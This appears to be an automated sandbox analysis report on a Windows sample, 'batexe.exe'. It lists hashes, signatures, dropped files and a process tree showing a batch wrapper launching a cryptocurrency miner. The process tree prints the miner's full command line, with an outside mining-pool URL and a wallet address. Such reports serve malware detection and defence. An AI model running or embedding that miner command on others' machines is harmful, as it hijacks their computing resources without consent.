Analysis

  • max time kernel
    295s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    23/02/2024, 16:14

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Users\Admin\AppData\Local\Temp\700.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\700.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\700.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E34.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2468

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\700.tmp\b2e.exe

    Filesize

    2.9MB

    MD5

    9317cafb85becd9011ca213e7be3a2bc

    SHA1

    1c84c389734da0532809700191b96dc61527e382

    SHA256

    644eb7fd5f540a11f942d00b2233e715a40b8548294924fc054db1e08b293090

    SHA512

    65120a9f1410f4b9350788c5898557be3d3b195f03b3425895748764fc052048f38998bb455cef4f25f748c696821a9a4622c8f09f6ae4603dcd6882be451684

  • C:\Users\Admin\AppData\Local\Temp\700.tmp\b2e.exe

    Filesize

    1.7MB

    MD5

    2e783098f55dece12f8dc2fa96a5760a

    SHA1

    7b0786bb33c5e67858e599f929ccd89888d9f34e

    SHA256

    cfdb3c7af24a0e6198add235131e2913f404a6a2e60c9f8a9253b29e61500850

    SHA512

    e20e12b96ecfc727f7c3c3a8afb4f1af0693713d66d927995a79ba7649b401d8b11c713c5e5f3ee0ccad56e9fc84482e585e014e37863dd145e77f71b54c2da0

  • C:\Users\Admin\AppData\Local\Temp\E34.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    311KB

    MD5

    727f96544b80b2a7bbd927b5625b4130

    SHA1

    558a24e246764fe2934a9a16d00aea8fa591e068

    SHA256

    bdb65a92c8f7d4747ef47f0c09bfc531b170a6d3ebfc3564401d51fed22efb78

    SHA512

    44b1399feef4d24465f3be50aaa284c1908619e399e62d4a4a05e2ee7d7d6fe50495aee6f0cc2a38efc7a588e10272926bb1d00898f8be15c5f636fc1237d040

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    289KB

    MD5

    21426fec21bd7b2508fe444a44658d05

    SHA1

    ec5ed71580811c339b1aa05af6efd04651a6c117

    SHA256

    6d0324b33270f8007efd868c52953d29142018f44dddc687482958472721e9ce

    SHA512

    a8810405bfef79bbaeb1ca47f5bbb8009d19cd346514354b1ab98e42daaa5200baf990165cdfae96837c3c3e60e9e1a8313462e374af39259d014712970485ca

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    316KB

    MD5

    e5a69b5f1c2a31f887965a671885d6a7

    SHA1

    8e1441adecc0500dee5a53d134adbcd6813d5beb

    SHA256

    c5f9aea35433bca26bc3c027c246281e6de47134621fd3e0ada2e5bd85ce1af1

    SHA512

    98bb47c475ba663e8d10dd27e6a74bc9dca87fc38f38a32ac9e183c4a0a1afedfd83f65ed944499d2f7914078c6fa00e2149ab10ef6ffd458621595b1e090a73

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    298KB

    MD5

    0df4854048884c2f73dd6b954d6ffdc5

    SHA1

    84dacc97febaf97210f238dd087bfd4c7615bf3f

    SHA256

    7a61280e7e7d9f4f937cfcbc0819fca224c420a06ad903b53f85e1e0d456388f

    SHA512

    c98a0e53c174f0b0dd040582e6eb07d1f88656276d7c58b0839fa62728f47589475c3f03208a57d3cdefe2ec1cfa0e8d689cd160e7ebc969f2c33b22f2dbe5f9

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    296KB

    MD5

    23d374ca518791cdd8047cca7f767019

    SHA1

    fd9da3912e2e4727bbaa7daf09fbfa497eff20d3

    SHA256

    92d4013a90320a7e29dec96c4047fe3940667bda0243a7164664ba409243d889

    SHA512

    995c3af27d27474c94d9e84e908f88e346fc2c2adb93139ca7603d16f2653a6570f31be06502631e5be2e205d0b5753a0913cd0f37dd4bcd7784b27d84193287

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    334KB

    MD5

    9a59db518cba5254da69e9e21bfe88cb

    SHA1

    a9d47d9943bf13f89f8aa4cb3f2adb5163b2424a

    SHA256

    1d1adbfe8215292c2aad29f543d3271e6fa773b4da0ab0e3bf1d48b1ce9d007e

    SHA512

    a9d63ab03258cbe0850b22a27f0cf3937db436cd4e6e02a4b6338cf077b355f1e1e737d8358eed13d25184e80ff81e5aee1c29f99d061565da251c05187e25c4

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    176KB

    MD5

    d8c1068d7e58c61f0d80539aca4744bc

    SHA1

    29f77b1defc87ecd367522484e7d5b50fdfb5033

    SHA256

    7d64e77d9b914c32237ab3b7df11e02db6213b5cd57a2bfcf08014ed16e2ca37

    SHA512

    b441821aa3603b2e30fb18b6c290c9919b3cc0b1c618a06506f7ba4cfad0852cbd0a2b5beebcadb733df93c76aa8569e0d16cceed1b208bfb1009982958beacb

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    333KB

    MD5

    760f18175f7ab1951bb607b865ec90f4

    SHA1

    48a609386f77543088076dc48767c0908374e074

    SHA256

    a8976867def282d637377510647b57a254cecff1d84dbcd5664d314ab61ddb2d

    SHA512

    27309ea536b034e841320be10d6291b8cd740705e25914e40e6a5b16657d9dee6b538f9e5650416871497e683a93fd8763277be7ab0c45f5a5eca777206cde7e

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    244KB

    MD5

    ea08a3b877fea03558c5aad568d11dac

    SHA1

    c8ea084f6f65ce2df04e689f2fbd932b9a038085

    SHA256

    c40049297464e56e002a0f75b05772afb07e5dcab5b359e6e41ee3d03fedacad

    SHA512

    8fdaa91a7cac1ce6ea29965e9e3ab63ad4a2c222ae8317ab4d100b958c03fc51817b16dd2dfb39a0d2b82bc799852004f5b81368bbfe15be64bfd1208bd4f799

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    315KB

    MD5

    6830dc0fbcb5ac28dfc645c93de8600a

    SHA1

    0063a1859bd044084757a455ccb27815972a6a49

    SHA256

    3aa29383e0a5147780e85b5b88b261b565235b6968d4d540a022985e82ab430b

    SHA512

    49f41645c557c2c115c7d5bb1438eca8491a0db22e4a81207209c3d98a1763c16634d351241dab0e408e8d41e18751972dc6a943a309f8f8a07c2576d13a500a

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    287KB

    MD5

    4f3c35bb3a924f0c0d7ea5839152e0c4

    SHA1

    feda00db987440f8fa3ec5f274cf10e4160db9ca

    SHA256

    f7dc63bc79121339eac8c5288689e9c1f4e704494192481f9705d7eb35543218

    SHA512

    d42e56e8e89be0f65da37d6bb0aa714fafbe513f9e5c05fa7188b07de998b5f67edecce68b1d13a390aa5f94f64fa32ae525e0805b43f8c316cc3dd248633808

  • memory/1412-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1412-4-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2468-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-42-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2468-41-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2468-44-0x0000000001050000-0x0000000002905000-memory.dmp

    Filesize

    24.7MB

  • memory/2468-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-43-0x0000000052D70000-0x0000000052E08000-memory.dmp

    Filesize

    608KB

  • memory/2468-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-86-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2468-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4812-6-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB